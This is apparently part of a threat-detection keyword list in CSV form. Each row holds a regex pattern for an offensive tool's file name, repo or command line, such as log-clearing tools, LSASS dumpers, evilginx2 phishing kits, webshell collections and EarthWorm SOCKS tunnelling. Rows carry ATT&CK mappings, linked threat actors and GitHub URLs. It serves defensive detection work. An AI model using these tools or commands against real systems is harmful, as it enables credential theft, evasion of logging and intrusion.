"*/EventCleaner.git*",".{0,1000}\/EventCleaner\.git.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","7056"
"*/EventLogCrasher.git*",".{0,1000}\/EventLogCrasher\.git.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","7057"
"*/EventLogCredentials.ps1*",".{0,1000}\/EventLogCredentials\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","7058"
"*/Eventlogedit-evt--General.git*",".{0,1000}\/Eventlogedit\-evt\-\-General\.git.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","1","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","7059"
"*/Eventlogedit-evtx--Evolution.git*",".{0,1000}\/Eventlogedit\-evtx\-\-Evolution\.git.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","1","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","7060"
"*/EventLogMaster.git*",".{0,1000}\/EventLogMaster\.git.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","1","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","7061"
"*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","7062"
"*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","N/A","10","10","131","31","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z","7063"
"*/EventViewer-UACBypass*",".{0,1000}\/EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","7064"
"*/evi1m0.bat*",".{0,1000}\/evi1m0\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7065"
"*/evil.cpp*",".{0,1000}\/evil\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","7066"
"*/evil.dll*",".{0,1000}\/evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","7067"
"*/evil.ps1*",".{0,1000}\/evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","7068"
"*/evil_pdf/*",".{0,1000}\/evil_pdf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7069"
"*/evil_script.py*",".{0,1000}\/evil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","7070"
"*/evil_script.py*",".{0,1000}\/evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7071"
"*/EvilClippy*",".{0,1000}\/EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","7072"
"*/EvilClippy-*.zip*",".{0,1000}\/EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","7073"
"*/evilclippy.cs*",".{0,1000}\/evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","7074"
"*/EvilClippy.git*",".{0,1000}\/EvilClippy\.git.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","7075"
"*/evilginx*",".{0,1000}\/evilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","7076"
"*/evilginx2.git*",".{0,1000}\/evilginx2\.git.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","7077"
"*/evilginx2/*",".{0,1000}\/evilginx2\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","7078"
"*/evilhost:*",".{0,1000}\/evilhost\:.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-JBoss.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7079"
"*/EvilLsassTwin*",".{0,1000}\/EvilLsassTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","7080"
"*/EvilLsassTwin/*",".{0,1000}\/EvilLsassTwin\/.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","7081"
"*/EvilnoVNC.git*",".{0,1000}\/EvilnoVNC\.git.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","7082"
"*/evil-proxy.git*",".{0,1000}\/evil\-proxy\.git.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","7083"
"*/evil-proxy.rb*",".{0,1000}\/evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","7084"
"*/evil-proxy/*",".{0,1000}\/evil\-proxy\/.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","#linux","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","7085"
"*/evilqr.git*",".{0,1000}\/evilqr\.git.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","7086"
"*/evilrdp.git*",".{0,1000}\/evilrdp\.git.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","7087"
"*/evilrdp/*",".{0,1000}\/evilrdp\/.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","7088"
"*/evilscript.ps1*",".{0,1000}\/evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","7089"
"*/evilscript.ps1*",".{0,1000}\/evilscript\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7090"
"*/evilSignatures.db*",".{0,1000}\/evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","7091"
"*/EvilSln.git*",".{0,1000}\/EvilSln\.git.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","5","N/A","N/A","N/A","N/A","7092"
"*/EvilSln/*.suo*",".{0,1000}\/EvilSln\/.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","N/A","10","","N/A","","","","7093"
"*/EvilTwinServer*",".{0,1000}\/EvilTwinServer.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","9","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","7094"
"*/EvtMute.git*",".{0,1000}\/EvtMute\.git.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","7095"
"*/ew -s lcx_listen -*",".{0,1000}\/ew\s\-s\slcx_listen\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7096"
"*/ew -s lcx_slave -*",".{0,1000}\/ew\s\-s\slcx_slave\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7097"
"*/ew -s lcx_tran -*",".{0,1000}\/ew\s\-s\slcx_tran\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7098"
"*/ew -s rcsocks -*",".{0,1000}\/ew\s\-s\srcsocks\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7099"
"*/ew -s ssocksd -*",".{0,1000}\/ew\s\-s\sssocksd\s\-.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#linux","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","7100"
"*/Example_C2_Profile*",".{0,1000}\/Example_C2_Profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","7101"
"*/Example_Payload_Type/*",".{0,1000}\/Example_Payload_Type\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","7102"
"*/ExcelDocWriter.cs*",".{0,1000}\/ExcelDocWriter\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","7103"
"*/exchanger.py*",".{0,1000}\/exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7104"
"*/exchanger.py*",".{0,1000}\/exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7105"
